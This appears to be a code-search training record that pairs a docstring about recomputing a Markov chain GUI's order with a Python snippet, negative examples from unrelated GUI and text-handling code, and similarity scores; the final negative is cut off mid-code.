"def test_function():\n\n print(\"\\n\") #because looks matter\n with open(\"word3.txt\", \"r\", encoding=\"utf-8\") as svenskfil:\n kattmat = 0\n for rad in svenskfil:\n if kattmat <= 9:\n ordet = rad.strip()\n if ordet in svenska:\n pass\n #print(ordet, end=\" \")\n else:\n svenska.put(ordet)\n print(ordet)\n kattmat += 1\n print(\"\\n\")\n #svenska.write_inorder()\n nod = ''\n startord = input('Välj startord: ')\n makechildren(startord)\n #slutord = input('Välj slutord: ')\n #q.enqueue(startord)",
"def add_task():\n\n yourTask = []\n line = input(\"Add your task: \")\n yourTask.append(line)\n taskfile = open('tasks.txt', 'a')\n for line in yourTask:\n taskfile.write(\"%s\\n\" % line)\n taskfile.close()\n\n import menu"
] |
[
"0.58673614",
"0.58666176",
"0.5830618",
"0.57294697",
"0.57178396",
"0.56749254",
"0.56574875",
"0.5655286",
"0.55703944",
"0.55577236",
"0.55479455",
"0.553887",
"0.55290604",
"0.5523641",
"0.55101806",
"0.5491232",
"0.548524",
"0.54401654",
"0.5432001",
"0.54061073",
"0.5403237",
"0.5383538",
"0.537729",
"0.5336503",
"0.53361726",
"0.53314495",
"0.532804",
"0.5301073",
"0.5275858",
"0.52727306"
] |
0.7365237
|
0
|
Adds any text the user entered into the user_string_entry component to this GUI's Markov Chain.
|
def add_user_text(self):
    text_to_add = self.user_string_entry.get()
    self.user_string_entry.delete(0, tk.END)
    self.markov_chain.add_string(text_to_add)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _settext(self, textEntered):\n if textEntered.strip() == '':\n textEntered=self.data['initialtext']\n self.entry.enterText(textEntered)\n else:\n if callable(self.data['callback']): self.data['callback'](textEntered)\n if self.data['autoexit'] and callable(self.data['exit']):\n # NOTE not safe to call here user callback...\n taskMgr.doMethodLater(.5, self.data['exit'], '_ntryxt')",
"def morphstring_add(self, stringz):\n self.textEdit_morph.setTextColor(QColor(0, 0, 0, 255))\n stringz += f\" kernel: {self.spinBox.value()} shape: {self.comboBox.currentIndex()}\"\n self.textEdit_morph.append(stringz)",
"def displayText(self):\n if self.entryWidget.get().strip() == \"\":\n tkMessageBox.showerror(\"Tkinter Entry Widget\", \"Enter a text value\")\n else:\n self.file_com.write(self.entryWidget.get().strip()+'\\n')",
"def append(self, entry):\n self.strings.append(entry)",
"def update_text(self):\n likes = \"\"\n if self.comedy.get():\n likes += \"You like comedy.\"\n if self.drama.get():\n likes += \"You like drama.\"\n if self.romance.get():\n likes += \"You like romantic.\"\n self.result.delete(0.0, END) # delete from position 0 until the end\n self.result.insert(0.0, likes) # insert to textbox the text in likes in position 0",
"def build_user_input(self):\n pass",
"def add_text(self, text):\n self.text = self.text + text",
"def _enter_text(elem, text, append=False, prepend=False, clear=True):\n pre = app = u''\n\n if prepend:\n pre = elem.value()\n elif append:\n app = elem.value()\n if clear:\n elem.clear()\n elem.send_keys((pre + text + app))",
"def handle_gui_example_three_intent(self, message):\n self.gui['sampleText'] = \"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Egestas sed tempus urna et pharetra pharetra massa massa ultricies. Aliquam sem et tortor consequat id porta nibh. Amet est placerat in egestas erat imperdiet sed. Ut ornare lectus sit amet est placerat in egestas erat. Iaculis eu non diam phasellus vestibulum lorem sed risus ultricies. Hac habitasse platea dictumst vestibulum rhoncus est pellentesque. Vulputate eu scelerisque felis imperdiet proin fermentum. Neque convallis a cras semper auctor neque. Pharetra magna ac placerat vestibulum lectus mauris ultrices eros in. Phasellus faucibus scelerisque eleifend donec pretium vulputate. Malesuada bibendum arcu vitae elementum curabitur vitae nunc. Tellus id interdum velit laoreet id donec. Diam donec adipiscing tristique risus nec. Nisi lacus sed viverra tellus in hac habitasse platea. Amet venenatis urna cursus eget nunc scelerisque viverra mauris in. Sit amet nisl suscipit adipiscing bibendum est ultricies. Nec ultrices dui sapien eget mi proin sed. Egestas dui id ornare arcu odio ut sem nulla. Rhoncus aenean vel elit scelerisque. Neque gravida in fermentum et sollicitudin. Pellentesque massa placerat duis ultricies lacus sed. Nunc id cursus metus aliquam eleifend mi. Eu feugiat pretium nibh ipsum consequat nisl. Aenean euismod elementum nisi quis eleifend quam adipiscing vitae. Est ante in nibh mauris cursus mattis. Sagittis eu volutpat odio facilisis mauris sit amet. At consectetur lorem donec massa sapien faucibus. Odio facilisis mauris sit amet. Quis ipsum suspendisse ultrices gravida dictum fusce. Sagittis nisl rhoncus mattis rhoncus urna neque viverra justo nec. Eget mi proin sed libero enim sed faucibus. Interdum velit euismod in pellentesque massa. Et netus et malesuada fames. Velit aliquet sagittis id consectetur purus. Condimentum lacinia quis vel eros donec ac odio tempor orci. Amet consectetur adipiscing elit pellentesque habitant. Eleifend mi in nulla posuere sollicitudin aliquam ultrices sagittis orci. Nisi porta lorem mollis aliquam ut porttitor leo a diam. Egestas integer eget aliquet nibh praesent tristique. Velit scelerisque in dictum non. Id volutpat lacus laoreet non curabitur gravida arcu ac. Suspendisse interdum consectetur libero id faucibus nisl tincidunt eget. Ipsum a arcu cursus vitae congue mauris. Duis at consectetur lorem donec massa. Orci sagittis eu volutpat odio facilisis mauris. Eget mauris pharetra et ultrices neque ornare. Commodo nulla facilisi nullam vehicula ipsum a. Arcu risus quis varius quam quisque. Gravida in fermentum et sollicitudin. Lacus laoreet non curabitur gravida arcu ac tortor dignissim. Netus et malesuada fames ac turpis. Ipsum dolor sit amet consectetur adipiscing. Tellus elementum sagittis vitae et leo duis ut diam quam. Vitae et leo duis ut diam quam nulla. Risus pretium quam vulputate dignissim. Justo laoreet sit amet cursus sit amet dictum sit. Blandit libero volutpat sed cras. Lacus sed viverra tellus in. Ornare lectus sit amet est placerat in egestas erat. Tortor dignissim convallis aenean et tortor at. Tempus quam pellentesque nec nam aliquam. Nisi scelerisque eu ultrices vitae auctor eu augue ut lectus. Consequat id porta nibh venenatis cras sed felis eget. Massa enim nec dui nunc mattis enim ut. Dignissim enim sit amet venenatis urna. Ac tincidunt vitae semper quis lectus nulla at. Sed felis eget velit aliquet sagittis. 
Vel turpis nunc eget lorem dolor sed viverra. Non consectetur a erat nam at lectus. Iaculis eu non diam phasellus vestibulum. Dolor sit amet consectetur adipiscing elit ut aliquam purus sit. Libero justo laoreet sit amet cursus sit. Tellus pellentesque eu tincidunt tortor. Maecenas volutpat blandit aliquam etiam erat velit scelerisque in. Semper risus in hendrerit gravida rutrum quisque non tellus orci. Diam in arcu cursus euismod quis viverra nibh cras pulvinar. Habitasse platea dictumst quisque sagittis purus sit amet volutpat consequat. Elit ut aliquam purus sit. Dui faucibus in ornare quam viverra orci sagittis eu. Purus ut faucibus pulvinar elementum integer. Condimentum lacinia quis vel eros donec ac odio tempor. At in tellus integer feugiat scelerisque varius morbi. Augue eget arcu dictum varius duis. Aliquam sem et tortor consequat id. Bibendum arcu vitae elementum curabitur vitae. Massa sed elementum tempus egestas sed sed. Suscipit adipiscing bibendum est ultricies. Etiam tempor orci eu lobortis.\"\n self.gui.show_page(\"paginationExample.qml\")",
"def update_user_word(self, user_in):\n self.user_word += user_in",
"def print_entry(text):\n print \"Text entered: \\n '%s'\" % text",
"def text_entry(self):\n\n allowed_sequences = set(['KEY_ENTER', 'KEY_ESCAPE', 'KEY_DELETE'])\n\n sys.stdout.write('Enter text (<Esc> to abort) : ')\n sys.stdout.flush()\n\n # Track start column to ensure user doesn't backspace too far\n start_column = self.term.get_location()[1]\n cur_column = start_column\n choice = ''\n with self.term.cbreak():\n val = ''\n while val != 'KEY_ENTER' and val != 'KEY_ESCAPE':\n val = self.term.inkey()\n if not val:\n continue\n elif val.is_sequence:\n val = val.name\n if val not in allowed_sequences:\n continue\n\n if val == 'KEY_ENTER':\n break\n elif val == 'KEY_ESCAPE':\n pass\n elif val == 'KEY_DELETE':\n if cur_column > start_column:\n sys.stdout.write(u'\\b \\b')\n cur_column -= 1\n choice = choice[:-1]\n else:\n choice = choice + val\n sys.stdout.write(val)\n cur_column += 1\n sys.stdout.flush()\n\n # Clear to beginning of line\n self.set_input(choice)\n self.set_sound_stage(choice)\n sys.stdout.write(self.term.clear_bol)\n sys.stdout.write(self.term.move(self.term.height, 0))\n sys.stdout.flush()",
"def getInput(self):\n self.userInput = self.entry.get()",
"def UserInput(self, username, userinput):\n pass",
"def ui_input_text() -> str:\n\ttext = input('enter your text ')\n\treturn text",
"def addText(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n pass",
"def add_input(input_string, trie):\n trie.insert(input_string) # add name to Trie",
"def entertext(Title,objectname,stringtoenter):\n try:\n ldtp.enterstring(Title,objectname,stringtoenter)\n logging.DEBUG(\"entered string\")\n except Exception as er:\n logging.DEBUG(\"Not able to enter the string in %\")",
"def push(self, text, calledFromClear = False, label=None, order=None, textinputText=None):\r\n self.phone.comment('%s(%s)' % (calledFromClear and 'clear.sx' or 'input.push', text))\r\n\r\n # if label given as logical text, do translation\r\n if self.phone.isLogicalText(label):\r\n label = self.phone.getTranslation(label)\r\n # if textinputText has been given as logical\r\n elif self.phone.isLogicalText(textinputText):\r\n textinputText = self.phone.getTranslation(textinputText)\r\n\r\n text = scripting.escape(text)\r\n\r\n # if label is given as anchor, find all labels and their parents' childs with type textinput. if label match, use the input\r\n if label != None:\r\n sxString = \\\r\n \"\"\"\r\n (let ((labels (send primary-root-container get-children-by-type \"label\")))\r\n (for-each (lambda(x)\r\n (when (equal? (send x get-text) \"%s\")\r\n (define parent (send x get-parent))\r\n (define textinputs (send parent get-children-by-type \"textinput\"))\r\n (when (pair? textinputs)\r\n (send (car textinputs) set-text \"%s\")\r\n )\r\n )\r\n )\r\n labels\r\n )\r\n )\r\n \"\"\" % (label, text)\r\n\r\n elif textinputText != None:\r\n # textinput text as anchor\r\n sxString = \\\r\n \"\"\"\r\n (let ((textinputs (send primary-root-container get-children-by-type \"textinput\")))\r\n (for-each (lambda(x)\r\n (when (equal? (send x get-text) \"%s\")\r\n (send x set-text \"%s\")\r\n )\r\n )\r\n textinputs\r\n )\r\n )\r\n \"\"\" % (textinputText, text)\r\n elif order != None:\r\n # textinput field's order given\r\n valid = ['car', 'first', 'second', 'third', 'fourth', 'fifth', 'sixth','seventh', 'eighth', 'ninth', 'tenth', 'last']\r\n if not order in valid:\r\n self.phone.fail(\"Input push: Wrong argument for order. Valid ones: %s \" % valid)\r\n\r\n sxString = \\\r\n \"\"\"\r\n (let ((textinputs (send primary-root-container get-children-by-type \"textinput\")))\r\n (when (pair? textinputs)\r\n (send (%s textinputs) set-text \"%s\")\r\n )\r\n )\r\n \"\"\" % (order, text)\r\n else:\r\n # if no label nor textinput text nor order has been given, text will be pushed to focused textinput field\r\n sxString = \\\r\n \"\"\"\r\n (let ((textinputs (send primary-root-container get-children-by-type \"textinput\")))\r\n (for-each (lambda(x)\r\n (when (send x has-focus)\r\n (send x set-text \"%s\")\r\n )\r\n )\r\n textinputs\r\n )\r\n )\r\n \"\"\" % text\r\n\r\n self.phone.uiState.getCurrentState(refresh = True)\r\n\r\n # check that text input field is found\r\n if self.phone.uiState.getCurrentState().find('//textinput'):\r\n sxResp = self.phone.sx(sxString)\r\n\r\n if 'error' in sxResp:\r\n self.phone.fail('%s(%s) failed, SX error (%s)' % \\\r\n (calledFromClear and 'clear.sx' or 'input.push', text, sxResp))\r\n else:\r\n self.phone.fail('%s(%s) failed, text input field not found' % \\\r\n (calledFromClear and 'clear.sx' or 'input.push', text))",
"def __init__(self,name,value,*args,**kargs):\n self._is_string_ = type(value) == str\n self._plain = kargs.get('plain',False)\n self.input = QtGui.QTextEdit()\n InputItem.__init__(self,name,*args,**kargs)\n self.setValue(value)\n self.layout().insertWidget(1,self.input)",
"def on_text_box(self, event):\n text_box_value = self.text_box.GetValue()\n text = \"\".join([_(u\"New text box value: \"), text_box_value])\n if self.state == 0:\n self.canvas_2d.render(text)\n else:\n self.canvas_3d.render()",
"def add_text(self, text: str) -> None:\n self.texts.append(text.strip().rstrip(\"\\n\"))",
"def perform_insert(self, entry, new_text, new_pos):\n entry.handler_block_by_func(self.cb_f1_entry_1_insert_float)\n entry.set_text(new_text)\n entry.handler_unblock_by_func(self.cb_f1_entry_1_insert_float)\n\n GObject.idle_add(entry.set_position, new_pos)\n\n entry.stop_emission(\"insert_text\")\n return",
"def _set_text(self, text):\n self.clear()\n r = self.add_run()\n r.text = _to_unicode(text)",
"def addstr(self,name,string):\n\t\tself.windows[name].addstr(string)",
"def add_text_edit(self, name, value=None, label=None, add_indicator=None, location=(None,0)):\n widget=edit.LVTextEdit(self,value=value)\n widget.setObjectName(_fromUtf8(self.name+\"_\"+name))\n return self.add_simple_widget(name,widget,label=label,add_indicator=add_indicator,location=location)",
"def get_user_text_input(self):\n\t\tuser_input = raw_input('You: ')\n\t\treturn user_input",
"def get_user_input(self, text: str, old_val: str = \"\") -> str:\n x = self.window.width // 2 # center of screen\n y = self.window.height // 2 # center of screen\n input = old_val\n print(end=self.term.home + self.term.clear)\n print(self.term.move_xy(x, y) + self.term.red_bold + text)\n while True:\n print(end=self.term.home + self.term.clear)\n print(\n self.term.move_xy(x - len(input + text) // 2, y)\n + self.term.red_bold\n + text\n + self.term.blue\n + self.term.underline\n + input\n + self.term.normal\n )\n val = self.term.inkey()\n if val.name == \"KEY_ENTER\":\n break\n elif val.name == \"KEY_BACKSPACE\":\n input = input[:-1]\n else:\n input += val\n return input",
"def addText(self, text, textxy, textargs=None):\n if textargs is None:\n textargs = {}\n restore = []\n restore.append({'text': self.attr('text'),\n 'textxy': self.attr('textxy'),\n 'textargs': self.attr('textargs')})\n text, textxy, textargs = self._checkValidTextInput(text, textxy, textargs)\n attrs = {'text': text, 'textxy': textxy, 'textargs': textargs}\n if self.attr('text', None) is None:\n self.update(attrs)\n else: # need to merge existing with new\n self.checkValidText() # makes sure existing info are as lists\n for key in attrs:\n self.update({key: self.attr(key) + attrs[key]})\n self.checkValidText()\n return restore",
"def insert_text(self, text):\n self.str += text"
] |
[
"0.61185825",
"0.5684883",
"0.5672892",
"0.56151104",
"0.5603731",
"0.55997413",
"0.5588983",
"0.5568581",
"0.55082643",
"0.5503857",
"0.54837346",
"0.5478493",
"0.5453264",
"0.5412463",
"0.53762734",
"0.5370564",
"0.5360708",
"0.5335736",
"0.53332293",
"0.53150713",
"0.53012276",
"0.5288266",
"0.526715",
"0.52644527",
"0.52574766",
"0.5250164",
"0.5215102",
"0.5207209",
"0.5191995",
"0.51818204"
] |
0.85894454
|
0
|
Sets the number of sentences this GUI's Markov Chain will be asked to produce, based on the current value of the num_sentences SpinBox component.
|
def set_number_of_sentences(self):
    self.number_of_sentences = int(self.num_sentences.get())
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def set_sentences(self, sentences):\n self._sentences = sentences",
"def _set_number_of_words(self, N):\n self.N_words_to_display = N",
"def setCount(self, num):\n self.count=num",
"def edit_text(self):\n self.text = self.ui.plainTextEdit.toPlainText()\n sentences_number = count_sentences(self.text)\n self.ui.label.setText(\n f\"{count_sentences(self.text)} sentences in source text\")\n self.ui.spinBox.setMaximum(sentences_number)",
"def setMaxSentenceSize(self, value):\n return self._set(maxSentenceSize=value)",
"def setMinSentenceSize(self, value):\n return self._set(minSentenceSize=value)",
"def set_numpins(self, n):\n self.numpins = n",
"def set_num_jobs(self, num):\n self.num_jobs = num",
"def setNumThreads(self, num):\r\n self.threads = num",
"def set_number_of_samples(self, N):\n\n self.numSamples = N",
"def set_min_sentence_length(self):\n new_min = int(self.set_min_sentence.get())\n cur_max = self.max_sentence_length\n\n if new_min < cur_max:\n self.min_sentence_length = new_min\n else:\n old_min = self.min_sentence_length\n old_min_var = tk.StringVar(self.master)\n old_min_var.set(str(old_min))\n self.set_min_sentence.config(textvariable=old_min_var)",
"def set_num_updates(self, num_updates):\n self.num_updates = num_updates",
"def set_num_updates(self, num_updates):\n self.num_updates = num_updates",
"def setNumThreads(cls, numThreads: int):\n cls.NUMTHREADS = numThreads",
"def set_max_sentence_length(self):\n new_max = int(self.set_max_sentence.get())\n cur_min = self.min_sentence_length\n\n if new_max > cur_min:\n self.max_sentence_length = new_max\n else:\n old_max = self.max_sentence_length\n old_max_var = tk.StringVar(self.master)\n old_max_var.set(str(old_max))\n self.set_max_sentence.config(textvariable=old_max_var)",
"def setSplitCount(self, count):\n pass",
"def setMancount(self, cnt):\n self.__mancount=cnt",
"def set_Count(self, value):\n super(MoneyReceivedInputSet, self)._set_input('Count', value)",
"def number_of_pages(self, number_of_pages):\n self._number_of_pages = number_of_pages",
"def num_slots(self, num_slots):\n\n self._num_slots = num_slots",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)"
] |
[
"0.65060955",
"0.61695755",
"0.59748507",
"0.5911244",
"0.58793664",
"0.5843372",
"0.5841032",
"0.58173054",
"0.5584266",
"0.55234367",
"0.549743",
"0.5469665",
"0.5469665",
"0.54437494",
"0.54421407",
"0.5417",
"0.5392903",
"0.53676283",
"0.5358095",
"0.5322339",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636"
] |
0.87004405
|
0
|
Sets the minimum sentence length of any sentence this GUI's Markov Chain will output, as per the current value of the set_min_sentence SpinBox. If the current value is greater than or equal to the current maximum sentence length, no change is made.
|
def set_min_sentence_length(self):
    new_min = int(self.set_min_sentence.get())
    cur_max = self.max_sentence_length
    if new_min < cur_max:
        self.min_sentence_length = new_min
    else:
        old_min = self.min_sentence_length
        old_min_var = tk.StringVar(self.master)
        old_min_var.set(str(old_min))
        self.set_min_sentence.config(textvariable=old_min_var)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def setMinSentenceSize(self, value):\n return self._set(minSentenceSize=value)",
"def set_max_sentence_length(self):\n new_max = int(self.set_max_sentence.get())\n cur_min = self.min_sentence_length\n\n if new_max > cur_min:\n self.max_sentence_length = new_max\n else:\n old_max = self.max_sentence_length\n old_max_var = tk.StringVar(self.master)\n old_max_var.set(str(old_max))\n self.set_max_sentence.config(textvariable=old_max_var)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceSize(self, value):\n return self._set(maxSentenceSize=value)",
"def _set_minimum(self):\n self._level_gen.minimum_length = self._minimum_length_spinbox.value()\n self._refresh_view()",
"def setMaxSentenceLength(self, maxSentenceLength):\n return self._set(maxSentenceLength=maxSentenceLength)",
"def setMaxSentenceLength(self, maxSentenceLength):\n return self._set(maxSentenceLength=maxSentenceLength)"
] |
[
"0.7855158",
"0.76631397",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.68452406",
"0.6352008",
"0.634724",
"0.634724"
] |
0.87098616
|
0
|
Sets the maximum sentence length of any sentence this GUI's Markov Chain will output, as per the current value of the set_max_sentence SpinBox. If the current value is less than or equal to the current minimum sentence length, no change is made.
|
def set_max_sentence_length(self):
    new_max = int(self.set_max_sentence.get())
    cur_min = self.min_sentence_length
    if new_max > cur_min:
        self.max_sentence_length = new_max
    else:
        old_max = self.max_sentence_length
        old_max_var = tk.StringVar(self.master)
        old_max_var.set(str(old_max))
        self.set_max_sentence.config(textvariable=old_max_var)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceSize(self, value):\n return self._set(maxSentenceSize=value)",
"def setMaxSentenceLength(self, maxSentenceLength):\n return self._set(maxSentenceLength=maxSentenceLength)",
"def setMaxSentenceLength(self, maxSentenceLength):\n return self._set(maxSentenceLength=maxSentenceLength)",
"def set_min_sentence_length(self):\n new_min = int(self.set_min_sentence.get())\n cur_max = self.max_sentence_length\n\n if new_min < cur_max:\n self.min_sentence_length = new_min\n else:\n old_min = self.min_sentence_length\n old_min_var = tk.StringVar(self.master)\n old_min_var.set(str(old_min))\n self.set_min_sentence.config(textvariable=old_min_var)",
"def _set_maximum(self):\n self._level_gen.maximum_length = self._maximum_length_spinbox.value()\n self._refresh_view()",
"def setMinSentenceSize(self, value):\n return self._set(minSentenceSize=value)"
] |
[
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.80122334",
"0.7877077",
"0.7877077",
"0.7576211",
"0.6728245",
"0.65178245"
] |
0.8767241
|
0
|
Recomputes this GUI's Markov Chain if the desired order is changed from the current order, as per the value of the order_selection SpinBox component.
|
def recompute_markov_chain(self):
    new_order = int(self.order_selection.get())
    if new_order != self.markov_chain.order:
        self.markov_chain.recompute_markov_chain(new_order)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def changeOrder(self):\n order = self.orderSpinBox.value()\n nfilter = int(str(self.filterComboBox.currentText()))\n if order > nfilter - 2:\n order = nfilter - 2\n if order < 1:\n order = 1\n self.orderSpinBox.setValue(order)\n self.order = order",
"def View_Preorder( self ):\r\n cb.order = 0\r\n self.system.Draw( )",
"def View_Inorder( self ):\r\n cb.order = 1\r\n self.system.Draw( )",
"def update_normalization_order(self):\n self._cache[\"input\"][\"order\"] = int(self.order.currentText())\n self.reset_input_style_defaults()\n self.fit_continuum(True)\n self.draw_continuum(True)\n return None",
"def check_for_different_input_settings(self):\n\n session, index = self.parent.session, self.current_order_index\n\n # Is there continuum already for this new order?\n continuum = session.metadata[\"normalization\"][\"continuum\"][index]\n normalization_kwargs \\\n = session.metadata[\"normalization\"][\"normalization_kwargs\"][index]\n\n # These keys don't have widgets, but need to be updated.\n extra_keys = (\"additional_points\", \"exclude\")\n for key in extra_keys:\n if key in normalization_kwargs:\n self._cache[\"input\"][key] = normalization_kwargs[key]\n elif key in self._cache[\"input\"]:\n del self._cache[\"input\"][key]\n\n if continuum is None: return\n\n # If so, are the current normalization keywords different to the ones\n # used for this one?\n input_items = {\n \"function\": [self.function_label, self.function],\n \"order\": [self.order_label, self.order],\n \"max_iterations\": [self.max_iter_label, self.norm_max_iter],\n \"low_sigma_clip\": [self.low_sigma_clip_label, self.low_sigma_clip],\n \"high_sigma_clip\": \\\n [self.high_sigma_clip_label, self.high_sigma_clip],\n \"knot_spacing\": [self.knot_spacing, self.knot_spacing_label],\n }\n\n diff = dict_updated(self._cache[\"input\"], normalization_kwargs,\n exclude=(\"additional_points\", \"exclude\"))\n\n # By default, everything should be styled normally.\n self.reset_input_style_defaults(sum(input_items.values(), []))\n for key, (current, used) in diff.items():\n if key in input_items:\n # Update the font-weight of those objects.\n items = input_items[key]\n for item in items:\n item.setStyleSheet(\"{0} {{ font-weight: bold }}\".format(\n item.__class__.__name__))\n item.setStatusTip(\"Order {0} was normalized using {1} =\"\n \" {2} (not {3})\"\\\n .format(1 + index, key, used, current))\n\n \n return None",
"def update_continuum_order_2(self):\n self._get_selected_model().metadata[\"continuum_order\"] \\\n = int(self.combo_continuum_2.currentText())\n return None",
"def update_order():",
"def update_order():",
"def update_continuum_order(self):\n self._get_selected_model().metadata[\"continuum_order\"] \\\n = int(self.combo_continuum.currentText())\n return None",
"def View_Postorder( self ):\r\n cb.order = 2\r\n self.system.Draw( )",
"def change_order(self):\n if self.controller.shared_data.obj_track.size == 0:\n message = 'There is no loaded track to change order'\n messagebox.showwarning(title='Insert Time Assistant',\n message=message)\n return\n\n self.timestamp = dt.datetime(2000, 1, 1, 0, 0, 0)\n self.speed = 0\n\n top = tk.Toplevel()\n top.title('Change Segment Order Assistant')\n\n # Insert data frame\n frm_form = tk.Frame(top, relief=tk.FLAT, borderwidth=3)\n frm_form.pack() # insert frame to use grid on it\n spn_seg = collections.defaultdict()\n\n available_segments = \\\n self.controller.shared_data.obj_track.df_track.segment.unique()\n\n for i, entry in enumerate(available_segments):\n # This allow resize the window\n top.columnconfigure(i, weight=1, minsize=75)\n top.rowconfigure(i, weight=1, minsize=50)\n\n # Create widgets\n var = tk.StringVar(top)\n var.set(i + 1)\n color = utils.rgb2hexcolor(\n utils.color_rgb(plots.COLOR_LIST[(entry - 1) % plots.N_COLOR]))\n\n spn_seg[entry] = tk.Spinbox(from_=1,\n to=99,\n master=frm_form,\n width=8,\n textvariable=var,\n justify=tk.RIGHT,\n relief=tk.FLAT)\n\n lbl_label = tk.Label(master=frm_form, text=f'{entry}', anchor='w',\n width=6,\n height=1,\n relief=tk.FLAT,\n justify=tk.CENTER,\n bg=color)\n\n # Grid\n lbl_label.grid(row=i, column=0) # grid attached to frame\n spn_seg[entry].grid(row=i, column=1)\n\n # Button frame\n frm_button = tk.Frame(top)\n frm_button.pack(fill=tk.X, padx=5,\n pady=5) # fill in horizontal direction\n\n def _clear_box():\n for j, s in enumerate(spn_seg):\n spn_seg[s].delete(0, 8)\n spn_seg[s].insert(0, j + 1)\n\n def _insert_order():\n\n # Check valid order\n new_order = {}\n for _entry in available_segments:\n new_order[_entry] = 